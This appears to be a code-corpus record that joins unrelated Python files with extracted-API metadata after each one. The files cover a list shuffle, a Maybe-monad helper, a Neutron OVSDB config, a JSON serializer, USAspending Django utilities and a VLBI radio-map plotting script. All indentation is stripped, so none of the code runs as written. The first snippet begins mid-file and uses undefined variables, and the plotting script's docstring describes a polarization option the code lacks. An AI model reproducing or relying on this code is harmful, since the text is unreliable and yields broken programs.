def shuffleAlgorithm(data, ndata):
for i in range(ndata-1, 0, -1):
r = random.randint(0, i)
data[i], data[r] = data[r], data[i]
return data
print(data)
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
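# A quick sanity check (illustrative, not required by the assignment): shuffling only reorders
# items, so the shuffled list must still contain exactly the original values.
# assert sorted(shuffleAlgorithm(list(data), ndata)) == sorted(data)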
# Fisher-Yates algorithm - O(n) time complexity: the loop makes a single pass over the list,
# doing one constant-time swap per element; the list is modified in place (constant extra space) instead of being copied.
# Each step swaps the current last unshuffled item with a randomly chosen, not previously selected item, repeating until every item has been selected. | [
"random.randint"
]
| [((755, 775), 'random.randint', 'random.randint', (['(0)', 'i'], {}), '(0, i)\n', (769, 775), False, 'import random\n')] |
from typing import Callable, TypeVar, Union, Tuple
from krogon.infix import Infix
A = TypeVar('A')
B = TypeVar('B')
E = TypeVar('E')
Maybe = Union[Tuple['just', A], Tuple['nothing']]
def just(value=None):
return "just", value
def nothing():
return "nothing", None
def from_value(value) -> Maybe[B]:
return _cast_to_maybe(value)
def from_value_or_default(value, default) -> Maybe[B]:
return from_maybe(
_cast_to_maybe(value),
dict(if_just=lambda x: just(x),
if_nothing=lambda: _cast_to_maybe(default)))
@Infix
def then(maybe: Maybe[A], func: Callable[[A], Maybe[B]]) -> Maybe[B]:
if maybe[0] == "just":
return _cast_to_maybe(func(maybe[1]))
elif maybe[0] == "nothing":
return maybe
@Infix
def catch_nothing(maybe: Maybe[A], func: Callable[[A], Maybe[B]]) -> Maybe[B]:
if maybe[0] == "nothing":
return _cast_to_maybe(func())
elif maybe[0] == "just":
return maybe
@Infix
def map(maybe: Maybe[A], mapper: Callable[[A], B]) -> Maybe[B]:
if maybe[0] == "just":
return just(mapper(maybe[1]))
elif maybe[0] == "nothing":
return maybe
@Infix
def value_or_default(maybe: Maybe[A], default_value: B):
return maybe | from_maybe | (dict(if_just=lambda x: x, if_nothing=lambda: default_value))
@Infix
def from_maybe(maybe: Maybe[A], dict_args: dict) -> B:
if_just: Callable = dict_args['if_just']
if_nothing: Callable = dict_args['if_nothing']
if maybe[0] == "just" and if_just is not None:
return if_just(maybe[1])
elif maybe[0] == "nothing" and if_nothing is not None:
return if_nothing()
else:
raise Exception('Invalid Maybe: {}, {}'.format(maybe, dict_args))
def _cast_to_maybe(result):
if result is None:
return nothing()
if isinstance(result, tuple) and len(result) == 2:
maybe_type, value = result
if maybe_type == "just" or maybe_type == "nothing":
return result
return just(result)
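# Illustrative usage (a sketch, relying on the `x | op | y` Infix style already used above):
#   from_value(5) | map | (lambda x: x + 1) | value_or_default | 0     # -> 6
#   from_value(None) | map | (lambda x: x + 1) | value_or_default | 0  # -> 0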
| [
"typing.TypeVar"
]
| [((87, 99), 'typing.TypeVar', 'TypeVar', (['"""A"""'], {}), "('A')\n", (94, 99), False, 'from typing import Callable, TypeVar, Union, Tuple\n'), ((104, 116), 'typing.TypeVar', 'TypeVar', (['"""B"""'], {}), "('B')\n", (111, 116), False, 'from typing import Callable, TypeVar, Union, Tuple\n'), ((121, 133), 'typing.TypeVar', 'TypeVar', (['"""E"""'], {}), "('E')\n", (128, 133), False, 'from typing import Callable, TypeVar, Union, Tuple\n')] |
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from neutron.conf.agent import ovs_conf as agent_ovs_conf
from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf
from neutron.privileged.agent.ovsdb.native import helpers as priv_helpers
agent_ovs_conf.register_ovs_agent_opts(cfg.CONF)
ml2_ovs_conf.register_ovs_opts(cfg=cfg.CONF)
enable_connection_uri = functools.partial(
priv_helpers.enable_connection_uri,
log_fail_as_error=False, check_exit_code=False,
timeout=cfg.CONF.OVS.ovsdb_timeout,
inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)
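# Note: functools.partial binds the keyword values above once, at import time; callers then
# supply only the remaining positional argument(s) expected by
# priv_helpers.enable_connection_uri (e.g. the OVSDB connection string).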
| [
"functools.partial",
"neutron.conf.agent.ovs_conf.register_ovs_agent_opts",
"neutron.conf.plugins.ml2.drivers.ovs_conf.register_ovs_opts"
]
| [((861, 909), 'neutron.conf.agent.ovs_conf.register_ovs_agent_opts', 'agent_ovs_conf.register_ovs_agent_opts', (['cfg.CONF'], {}), '(cfg.CONF)\n', (899, 909), True, 'from neutron.conf.agent import ovs_conf as agent_ovs_conf\n'), ((910, 954), 'neutron.conf.plugins.ml2.drivers.ovs_conf.register_ovs_opts', 'ml2_ovs_conf.register_ovs_opts', ([], {'cfg': 'cfg.CONF'}), '(cfg=cfg.CONF)\n', (940, 954), True, 'from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf\n'), ((980, 1184), 'functools.partial', 'functools.partial', (['priv_helpers.enable_connection_uri'], {'log_fail_as_error': '(False)', 'check_exit_code': '(False)', 'timeout': 'cfg.CONF.OVS.ovsdb_timeout', 'inactivity_probe': '(cfg.CONF.OVS.of_inactivity_probe * 1000)'}), '(priv_helpers.enable_connection_uri, log_fail_as_error=\n False, check_exit_code=False, timeout=cfg.CONF.OVS.ovsdb_timeout,\n inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)\n', (997, 1184), False, 'import functools\n')] |
import json
from .base_serializer import BaseSerializer
class JsonSerializer(BaseSerializer):
'''Json serializer.'''
def _serialize(self, data: dict, **kwargs) -> str:
return json.dumps(data)
def _deserialize(self, data: str, **kwargs) -> dict:
return json.loads(data)
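# Illustrative usage (assuming BaseSerializer exposes public serialize/deserialize wrappers
# around the hook methods above):
#   JsonSerializer().serialize({'a': 1})   # -> '{"a": 1}'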
| [
"json.loads",
"json.dumps"
]
| [((195, 211), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (205, 211), False, 'import json\n'), ((285, 301), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (295, 301), False, 'import json\n')] |
from datetime import datetime
import warnings
import logging
from django.db.models import Q, Case, Value, When
from django.core.cache import caches, CacheKeyWarning
import django.apps
from usaspending_api.references.models import Agency, Location, RefCountryCode
from usaspending_api.references.helpers import canonicalize_location_dict
from usaspending_api.submissions.models import SubmissionAttributes
from usaspending_api.data.daims_maps import daims_maps
warnings.simplefilter("ignore", CacheKeyWarning)
def clear_caches():
for cache_name in ('default', 'locations', 'awards'):
caches[cache_name].clear()
def cleanse_values(row):
"""
Remove textual quirks from CSV values.
"""
row = {k: v.strip() for (k, v) in row.items()}
row = {k: (None if v.lower() == 'null' else v) for (k, v) in row.items()}
return row
def convert_date(date):
if date == "":
return None
return datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d')
def get_subtier_agency_dict():
"""Returns a dictionary with key = subtier agency code and value = agency id."""
# there's no unique constraint on subtier_code, so the order by below ensures that in the case of duplicate subtier
# codes, the dictionary we return will reflect the most recently updated one
agencies = Agency.objects.all().values(
'id',
'subtier_agency__subtier_code').order_by('subtier_agency__update_date')
subtier_agency_dict = {
a['subtier_agency__subtier_code']: a['id'] for a in agencies
}
return subtier_agency_dict
def fetch_country_code(vendor_country_code):
code_str = up2colon(vendor_country_code)
if code_str == "":
return None
country_code = RefCountryCode.objects.filter(Q(country_code=code_str) | Q(country_name__iexact=code_str)).first()
if not country_code:
# We don't have an exact match on the name or the code, so we need to
# chain filter on the name
query_set = RefCountryCode.objects
for word in code_str.split():
query_set = query_set.filter(country_name__icontains=word)
country_code = query_set.first()
return country_code
location_cache = caches['locations']
def get_or_create_location(row, mapper):
location_dict = mapper(row)
# Country-specific adjustments
if location_dict["location_country_code"] == "USA":
# Apparently zip codes are optional...
if location_dict["location_zip"]:
location_dict.update(
zip5=location_dict["location_zip"][:5],
zip_last4=location_dict["location_zip"][5:])
location_dict.pop("location_zip")
else:
location_dict.update(
foreign_postal_code=location_dict.pop("location_zip", None),
foreign_province=location_dict.pop("state_code", None))
if "city_name" in location_dict:
location_dict['foreign_city_name'] = location_dict.pop("city_name")
location_dict = canonicalize_location_dict(location_dict)
location_tup = tuple(location_dict.items())
location = location_cache.get(location_tup)
if location:
return location
location = Location.objects.filter(**location_dict).first()
if not location:
location = Location.objects.create(**location_dict)
location_cache.set(location_tup, location)
return location
def up2colon(input_string):
'Takes the part of a string before `:`, if any.'
if input_string:
return input_string.split(':')[0].strip()
return ''
def parse_numeric_value(string):
try:
return float(string)
except Exception:
return None
def get_fiscal_quarter(fiscal_reporting_period):
"""
Return the fiscal quarter.
Note: the reporting period being passed should already be in "federal fiscal format",
where period 1 = Oct. and period 12 = Sept.
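    For example, period 1 (October) maps to quarter 1 and period 12 (September) to quarter 4.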
"""
if fiscal_reporting_period in [1, 2, 3]:
return 1
elif fiscal_reporting_period in [4, 5, 6]:
return 2
elif fiscal_reporting_period in [7, 8, 9]:
return 3
elif fiscal_reporting_period in [10, 11, 12]:
return 4
def get_previous_submission(cgac_code, fiscal_year, fiscal_period):
"""
For the specified CGAC (e.g., department/top-tier agency) and specified fiscal year and quarter, return the
previous submission within the same fiscal year.
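    For example, given fiscal_period 9 (Q3), the agency's most recent earlier quarterly
    submission in the same fiscal year (e.g. period 6 / Q2) is returned, or None if none exists.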
"""
previous_submission = SubmissionAttributes.objects \
.filter(
cgac_code=cgac_code,
reporting_fiscal_year=fiscal_year,
reporting_fiscal_period__lt=fiscal_period,
quarter_format_flag=True) \
.order_by('-reporting_fiscal_period') \
.first()
return previous_submission
def update_model_description_fields():
"""
This method searches through every model Django has registered, checks if it
belongs to a list of apps we should update, and updates all fields with
'_description' at the end with their relevant information.
Dictionaries for DAIMS definitions should be stored in:
usaspending_api/data/daims_maps.py
Each map should be <field_name>_map for discoverability.
If there are conflicting maps (i.e., two models use type_description, but
different enumerations) prepend the map name with the model name and a dot.
For examples of these situations, see the documentation in daims_maps.py
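    A hypothetical illustration of the convention (these are not actual daims_maps entries):
    a shared enumeration would be registered as daims_maps['type_map'], while a
    model-specific override for the Award model would be daims_maps['Award.type_map'].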
"""
logger = logging.getLogger('console')
# This is a list of apps whose models will be checked for description fields
updatable_apps = [
"accounts",
"awards",
"common",
"financial_activities",
"references",
"submissions"
]
# This iterates over every model that Django has registered
for model in django.apps.apps.get_models():
# This checks the app_label of the model, and thus we can skip it if it is not in one of our updatable_apps.
# Thus, we'll skip any django admin apps, like auth, corsheaders, etc.
if model._meta.app_label not in updatable_apps:
continue
if model.__name__[:10] == "Historical":
continue
model_fields = [f.name for f in model._meta.get_fields()]
# This supports multi-case DAIMS
# We must filter on the model level rather than add them to the when clauses, because if there is a FK in the
# when clause Django is not guaranteed to join on that table properly.
#
# This is an array of tuples of the following format
# (Q object of filter, field_names -> case objects map for this filter)
#
# It is initialized with a blank filter and empty list, which is where default updates are stored
model_filtered_update_case_map = [(Q(), {})]
desc_fields = [field for field in model_fields if field.split('_')[-1] ==
"description"[:len(field.split('_')[-1])]]
non_desc_fields = [field for field in model_fields if field not in desc_fields]
desc_fields_mapping = {}
for desc_field in desc_fields:
actual_field_short = "_".join(desc_field.split('_')[:-1])
actual_field = None
for field in non_desc_fields:
if actual_field_short == field:
actual_field = field
elif actual_field_short == field[:len(actual_field_short)]:
actual_field = field
desc_fields_mapping[desc_field] = actual_field
# Loop through each of the models fields to construct a case for each applicable field
for field in model_fields:
# We're looking for field names ending in _description
split_name = field.split("_")
# If the last element in our split name isn't description, skip it
if len(split_name) == 1 or split_name[-1] != "description"[:len(split_name[-1])]:
continue
source_field = "_".join(split_name[:-1])
destination_field = field
# This is the map name, prefixed by model name for when there are non-unique description fields
source_field = desc_fields_mapping[field] if field in desc_fields_mapping else source_field
model_map_name = "{}.{}_map".format(model.__name__, source_field)
map_name = "{}_map".format(source_field)
# This stores a direct reference to the enumeration mapping
code_map = None
# Validate we have the source field
if source_field not in model_fields:
logger.debug("Tried to update '{}' on model '{}', but source field '{}' does not exist.".
format(destination_field, model.__name__, source_field))
continue
# Validate we have a map
# Prefer model_map_name over map_name
if model_map_name in daims_maps.keys():
code_map = daims_maps[model_map_name]
elif map_name in daims_maps.keys():
code_map = daims_maps[map_name]
else:
logger.warn("Tried to update '{}' on model '{}', but neither map '{}' nor '{}' exists.".
format(destination_field, model.__name__, model_map_name, map_name))
continue
# Cases start from 1
case_number = 1
case_name = "case_1"
case_map = "case_1_map"
while case_name in code_map.keys():
case_object = create_case(code_map[case_map], source_field)
# Construct a Q filter for this case
case_filter = Q(**code_map[case_name])
# See if we already have a tuple for this filter
case_tuple = [x for x in model_filtered_update_case_map if x[0] == case_filter]
if len(case_tuple) == 0:
# We don't, so create the tuple
temp_case_dict = {}
temp_case_dict[field] = case_object
model_filtered_update_case_map.append((case_filter, temp_case_dict))
else:
# We do, so just add our case object to that dictionary
case_tuple[0][1][field] = case_object
# Check for the next case
case_number += 1
case_name = "case_{}".format(case_number)
case_map = "case_{}_map".format(case_number)
# If our case number is still 1, then we didn't have any cases. Therefore, we perform the default
if case_number == 1:
case_object = create_case(code_map, source_field)
# Grab the first tuple, which has no filters
case_tuple = model_filtered_update_case_map[0]
# Add it to our dictionary
case_tuple[1][field] = case_object
for filter_tuple in model_filtered_update_case_map:
# For each filter tuple, check if the dictionary has any entries
if len(filter_tuple[1].keys()) > 0:
print("Updating model {}\n FILTERS:\n {}\n FIELDS:\n {}".
format(model.__name__, str(filter_tuple[0]), "\n ".join(filter_tuple[1].keys())))
try:
model.objects.filter(filter_tuple[0]).update(**filter_tuple[1])
except django.db.utils.ProgrammingError as e:
logger.warn(str(e))
logger.warn("(OK if invoked from a migration, when the table may not yet have been created)")
# Utility method for update_model_description_fields, creates the Case object
def create_case(code_map, source_field):
when_list = []
default = None
for code in code_map.keys():
when_args = {}
when_args[source_field] = code
when_args["then"] = Value(code_map[code])
# If our code is blank, change the comparison to ""
if code == "_BLANK":
when_args[source_field] = Value("")
# We handle the default case later
if code == "_DEFAULT":
default = Value(code_map[code])
continue
# Append a new when to our when-list
when_list.append(When(**when_args))
return Case(*when_list, default=default)
| [
"logging.getLogger",
"usaspending_api.references.models.Location.objects.filter",
"datetime.datetime.strptime",
"usaspending_api.submissions.models.SubmissionAttributes.objects.filter",
"usaspending_api.references.models.Location.objects.create",
"usaspending_api.references.helpers.canonicalize_location_dict",
"django.db.models.Case",
"django.db.models.Value",
"warnings.simplefilter",
"django.db.models.When",
"django.db.models.Q",
"usaspending_api.data.daims_maps.daims_maps.keys",
"usaspending_api.references.models.Agency.objects.all"
]
| [((463, 511), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'CacheKeyWarning'], {}), "('ignore', CacheKeyWarning)\n", (484, 511), False, 'import warnings\n'), ((3005, 3046), 'usaspending_api.references.helpers.canonicalize_location_dict', 'canonicalize_location_dict', (['location_dict'], {}), '(location_dict)\n', (3031, 3046), False, 'from usaspending_api.references.helpers import canonicalize_location_dict\n'), ((5468, 5496), 'logging.getLogger', 'logging.getLogger', (['"""console"""'], {}), "('console')\n", (5485, 5496), False, 'import logging\n'), ((12330, 12363), 'django.db.models.Case', 'Case', (['*when_list'], {'default': 'default'}), '(*when_list, default=default)\n', (12334, 12363), False, 'from django.db.models import Q, Case, Value, When\n'), ((3290, 3330), 'usaspending_api.references.models.Location.objects.create', 'Location.objects.create', ([], {}), '(**location_dict)\n', (3313, 3330), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((11928, 11949), 'django.db.models.Value', 'Value', (['code_map[code]'], {}), '(code_map[code])\n', (11933, 11949), False, 'from django.db.models import Q, Case, Value, When\n'), ((933, 968), 'datetime.datetime.strptime', 'datetime.strptime', (['date', '"""%m/%d/%Y"""'], {}), "(date, '%m/%d/%Y')\n", (950, 968), False, 'from datetime import datetime\n'), ((3201, 3241), 'usaspending_api.references.models.Location.objects.filter', 'Location.objects.filter', ([], {}), '(**location_dict)\n', (3224, 3241), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((12078, 12087), 'django.db.models.Value', 'Value', (['""""""'], {}), "('')\n", (12083, 12087), False, 'from django.db.models import Q, Case, Value, When\n'), ((12185, 12206), 'django.db.models.Value', 'Value', (['code_map[code]'], {}), '(code_map[code])\n', (12190, 12206), False, 'from django.db.models import Q, Case, Value, When\n'), ((12299, 12316), 'django.db.models.When', 'When', ([], {}), '(**when_args)\n', (12303, 12316), False, 'from django.db.models import Q, Case, Value, When\n'), ((6812, 6815), 'django.db.models.Q', 'Q', ([], {}), '()\n', (6813, 6815), False, 'from django.db.models import Q, Case, Value, When\n'), ((8951, 8968), 'usaspending_api.data.daims_maps.daims_maps.keys', 'daims_maps.keys', ([], {}), '()\n', (8966, 8968), False, 'from usaspending_api.data.daims_maps import daims_maps\n'), ((9703, 9727), 'django.db.models.Q', 'Q', ([], {}), '(**code_map[case_name])\n', (9704, 9727), False, 'from django.db.models import Q, Case, Value, When\n'), ((1324, 1344), 'usaspending_api.references.models.Agency.objects.all', 'Agency.objects.all', ([], {}), '()\n', (1342, 1344), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((1766, 1790), 'django.db.models.Q', 'Q', ([], {'country_code': 'code_str'}), '(country_code=code_str)\n', (1767, 1790), False, 'from django.db.models import Q, Case, Value, When\n'), ((1793, 1825), 'django.db.models.Q', 'Q', ([], {'country_name__iexact': 'code_str'}), '(country_name__iexact=code_str)\n', (1794, 1825), False, 'from django.db.models import Q, Case, Value, When\n'), ((4456, 4625), 'usaspending_api.submissions.models.SubmissionAttributes.objects.filter', 'SubmissionAttributes.objects.filter', ([], {'cgac_code': 'cgac_code', 'reporting_fiscal_year': 'fiscal_year', 'reporting_fiscal_period__lt': 'fiscal_period', 'quarter_format_flag': '(True)'}), '(cgac_code=cgac_code,\n reporting_fiscal_year=fiscal_year, 
reporting_fiscal_period__lt=\n fiscal_period, quarter_format_flag=True)\n', (4491, 4625), False, 'from usaspending_api.submissions.models import SubmissionAttributes\n'), ((9053, 9070), 'usaspending_api.data.daims_maps.daims_maps.keys', 'daims_maps.keys', ([], {}), '()\n', (9068, 9070), False, 'from usaspending_api.data.daims_maps import daims_maps\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 21 11:11:56 2020
This program is used to plot a polarization map from a VLBI FITS image.
You should specify the input FITS images by -i or --infile,
the output file by -o or --outfile,
the contour levels by -l or --levs,
the contour base by -c or --cmul,
the polarization parameters by -p or --pol: "icut pcut inc scale",
the plot window by -w or --win,
the restored beam position by -b or --bpos,
and the figure size by -f or --figsize.
Installation:
1. copy file
chmod a+x mapplot.py
cp mapplot.py ~/myapp
2. set envioment parameters
Add the following line to ~/.bashrc
export PATH=$PATH:/home/usename/myapp
source ~/.bashrc
Running like this:
mapplot.py -w <win> -f <figsize> -n <normalize> <infile> <cmul>
mapplot.py -i <input file list> -o <out.pdf> -c <cmul> -w <win> -p <pol>
Examples:
1. mapplot.py -i cta102.fits -o cta102-color.pdf -c 1.8e-3 -w '18 -8 -20 6' -f '7 6' -n 'power 0.5'
2. mapplot.py -w '18 -8 -20 6' -f '4.0 6' -n 'power 0.5' cta102.fits 1.8e-3
https://matplotlib.org/3.1.1/tutorials/colors/colormaps.html
https://matplotlib.org/3.2.1/api/_as_gen/matplotlib.colors.Normalize.html#matplotlib.colors.Normalize
@author: <NAME>
Shanghai Astronomical Observatory, Chinese Academy of Sciences
E-mail: <EMAIL>; <EMAIL>
"""
import sys
import getopt
from astropy.io import fits
from astropy.table import Table
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import matplotlib.colors as mcolors
def add_beam(ax, win, h, bpos=None, pad=2.0):
if bpos==None :
x = win[0] - pad * h['bmaj']*3.6E6
y = win[2] + pad * h['bmaj']*3.6E6
bpos = (x, y)
bmaj = h['bmaj'] * 3.6E6
bmin = h['bmin'] * 3.6E6
bpa = 90 - h['bpa']
e = Ellipse(bpos, bmaj, bmin, angle=bpa, ec='k', facecolor='gray')
ax.add_artist(e)
def annotate(ax, notefile=''):
if notefile != '':
tab = Table.read(notefile, format='csv')
for t in tab:
ax.text(t['x'], t['y'], t['text'])
# ax.annotate('%s' % h['object'], xy=(0.125,0.91), xycoords='figure fraction')
# ax.annotate('%.1f GHz' % (h['crval3']/1.0E9), xy=(0.83, 0.91), xycoords='figure fraction')
def cut_cmap(cmap, N_cut=0):
# cmap = mcolors.Colormap(cmap)
cmap = plt.get_cmap(cmap)
x = np.arange(N_cut, 256) / 256.0
color_index = cmap(x)
cmap = mcolors.ListedColormap(color_index)
return cmap
def get_normalize(args, vmin=0.0, vmax=1.0):
	# Default to a linear normalization; an empty or unrecognized spec falls back to this
	norm = mcolors.Normalize(vmin, vmax)
	if args == '':
		return norm
args = args.split(' ')
name = args[0]
if name == 'linear':
if len(args)==3:
vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.Normalize(vmin, vmax, True)
elif name == 'power':
if len(args)==1:
gamma = 0.5
if len(args)==2:
gamma = float(args[1])
elif len(args)==4:
gamma, vmin, vmax = np.array(args[1:], dtype='f4')
if gamma < 1.0 and vmin < 0.0:
vmin = 0.0
norm = mcolors.PowerNorm(gamma, vmin, vmax, True)
elif name == 'log':
if len(args)==3:
vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.LogNorm(vmin, vmax)
elif name == 'symlog':
if len(args)==2:
linthresh = float(args[1])
linscale = 1.0
elif len(args)==3:
linthresh, linscale = np.array(args[1:], dtype='f4')
elif len(args)==5:
linthresh, linscale, vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.SymLogNorm(linthresh, linscale, vmin, vmax)
elif name == 'twoslope':
if len(args)==2:
vcenter = float(args[1])
elif len(args)==4:
vcenter, vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.TwoSlopeNorm(vcenter, vmin, vmax)
return norm
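# Examples of `norm` strings accepted by get_normalize (derived from the parsing above):
#   'linear 0 1', 'power 0.5', 'log 1e-4 1e-1', 'symlog 1e-3', 'twoslope 0.0'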
def add_annotation(ax, infile=''):
if infile == '':
return
with open(infile, 'r') as f:
for line in f.readlines():
row = line.split(',')
row = [col.strip() for col in row]
typ = row[0]
args = row[1:]
if typ == 'text':
x, y, text = args
x, y = float(x), float(y)
ax.text(x, y, text)
elif typ == 'arrow':
x1, y1, x2, y2 = np.array(args, dtype='f4')
ax.annotate("", xy=(x1, y1), xytext=(x2, y2),
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))
elif typ == 'annotation':
x1, y1, x2, y2 = np.array(args[:-1], dtype='f4')
text = args[-1]
ax.annotate(text, xy=(x1, y1), xytext=(x2, y2),
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))
elif typ == 'ellipse':
x, y, majax, minax, pa = np.array(args, dtype='f4')
e = Ellipse((x,y), majax, minax, angle=pa, lw=0.5, fc='none', ec='k', ls='-')
ax.add_artist(e)
def set_axis(ax, w):
ax.set_aspect('equal')
ax.set_xlabel('Relative R.A. (mas)')
ax.set_ylabel('Relative Dec. (mas)')
ax.set_xlim(w[0],w[1])
ax.set_ylim(w[2],w[3])
ax.tick_params(which='both', direction='in', length=6, right=True, top=True)
ax.tick_params(which='minor',length=4)
ax.minorticks_on()
def word2pix(w, h):
if w == None:
W = [0, h['naxis1'], 0, h['naxis2']]
else:
x0, x1, y0, y1 = w
X0 = h['crpix1'] + x0/(h['cdelt1']*3.6E6)
Y0 = h['crpix2'] + y0/(h['cdelt2']*3.6E6)
X1 = h['crpix1'] + x1/(h['cdelt1']*3.6E6)
Y1 = h['crpix2'] + y1/(h['cdelt2']*3.6E6)
W = [int(X0), int(X1), int(Y0), int(Y1)]
return W
def pix2word(W, h):
if W == None:
W = [0, h['naxis1'], 0, h['naxis2']]
X0, X1, Y0, Y1 = W
x0 = h['cdelt1']*3.6E6 * (X0-h['crpix1'])
y0 = h['cdelt2']*3.6E6 * (Y0-h['crpix2'])
x1 = h['cdelt1']*3.6E6 * (X1-h['crpix1'])
y1 = h['cdelt2']*3.6E6 * (Y1-h['crpix2'])
w = [x0, x1, y0, y1]
return w
def savefig(outfile, dpi=100):
if outfile.lower().endswith('.pdf') :
plt.savefig(outfile)
elif outfile.lower().endswith('.jpg') or outfile.lower().endswith('.jpeg'):
plt.savefig(outfile, dpi=dpi)
elif outfile.lower().endswith('.png'):
plt.savefig(outfile, dpi=dpi)
def mapplot(infile, cmul, outfile='', win=None, levs=None, bpos=None,
figsize=None, dpi=100, annotationfile='', cmap='', N_cut=0,
norm='', fraction=0.05):
hdul = fits.open(infile)
h = hdul[0].header
# img = hdul[0].data[0, 0, :, :]
if levs==None:
levs = cmul*np.array([-1,1,2,4,8,16,32,64,128,256,512,1024,2048,4096])
# print(win)
if figsize == None :
figsize = (6, 6)
if win == None:
win = pix2word(None, h)
W = word2pix(None, h)
else:
W = word2pix(win, h)
img = hdul[0].data[0, 0, W[2]:W[3], W[0]:W[1]]
if cmap == '':
cmap = 'rainbow'
cmap = cut_cmap(cmap, N_cut)
vmin, vmax = np.min(img), np.max(img)
if norm == '':
norm = 'linear %.3f %.3f' % (vmin, vmax)
norm = get_normalize(norm, vmin, vmax)
fig, ax = plt.subplots()
fig.set_size_inches(figsize)
set_axis(ax, win)
add_beam(ax, win, h, bpos=bpos)
add_annotation(ax, annotationfile)
ax.contour(img, levs, extent=win,
linewidths=0.5, colors='k')
pcm = ax.imshow(img, extent=win, origin='lower',
interpolation='none', cmap=cmap, norm=norm)
cbar = fig.colorbar(pcm, ax=ax, fraction=fraction)
# cbar.ax.minorticks_off()
cbar.ax.tick_params('both',direction='in',right=True,top=True,which='both')
cbar.ax.tick_params(axis='y', labelrotation=90)
fig.tight_layout(pad=0.5)
if outfile != '':
savefig(outfile, dpi)
hdul.close()
def myhelp():
print('Help: mapplot.py -w "18 -8 -20 6" -f "7 6" -n "power 0.5" <cta102.fits> <1.8e-3>')
print(' or: mapplot.py -i cta102.fits -o cta102.png -w "18 -8 -20 6" -f "7 6" -n "power 0.5"')
def main(argv):
# infile = r'3c66a-calib/circe-beam.fits'
infile = ''
outfile = ''
annotationfile = ''
cmul = ''
win = None
levs = None
bpos = None
figsize = None
dpi = 100
colormap = ''
N_cut = 0
norm = ''
fraction = 0.05
try:
opts, args = getopt.getopt(argv, "hi:c:o:w:l:b:f:d:a:n:N:",
['help', 'infile=', 'cmul=', 'outfile=', 'win=',
'bpos=', 'figsize=', 'dpi=', 'annotatefile=', 'levs=', 'colormap=',
'N_cut=', 'norm=', 'fraction='])
except getopt.GetoptError:
myhelp()
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
myhelp()
elif opt in ('-i', '--infile'):
infile = arg
elif opt in ('-c', '--cmul'):
cmul = arg
elif opt in ('-o', '--outfile'):
outfile = arg
elif opt in ('-w', '--win'):
win = arg
elif opt in ('-l', '--levs'):
levs = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-b', '--bpos'):
bpos = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-f', '--figsize'):
figsize = np.array(arg.split(), dtype=np.float64).tolist()
elif opt in ('-d', '--dpi'):
dpi = int(arg)
elif opt in ('-a', '--annotatefile'):
annotationfile = arg
elif opt in ('--colormap', ):
colormap = arg
elif opt in ('-N', '--N_cut'):
N_cut = int(arg)
elif opt in ('-n', '--norm'):
norm = arg
elif opt in ('--fraction',):
fraction = float(arg)
if infile=='' and len(args)==2:
infile, cmul = args
if infile=='' and len(args)==3:
infile, outfile, cmul = args
if infile=='' and len(args)==4:
infile, outfile, cmul, win = args
if outfile == '':
outfile = infile.split('.')[0] + '.pdf'
cmul = float(cmul)
if type(win) == str:
win = np.array(win.split(), dtype=np.float64).tolist()
mapplot(infile, cmul, outfile=outfile, win=win, levs=levs, bpos=bpos,
figsize=figsize, dpi=dpi, annotationfile=annotationfile,
cmap=colormap, N_cut=N_cut, norm=norm, fraction=fraction)
if __name__ == '__main__' :
main(sys.argv[1:]) | [
"getopt.getopt",
"matplotlib.pyplot.savefig",
"sys.exit",
"matplotlib.colors.LogNorm",
"numpy.min",
"matplotlib.colors.ListedColormap",
"numpy.max",
"numpy.array",
"matplotlib.colors.PowerNorm",
"matplotlib.colors.SymLogNorm",
"astropy.table.Table.read",
"astropy.io.fits.open",
"matplotlib.colors.Normalize",
"matplotlib.patches.Ellipse",
"matplotlib.colors.TwoSlopeNorm",
"matplotlib.pyplot.subplots",
"numpy.arange",
"matplotlib.pyplot.get_cmap"
]
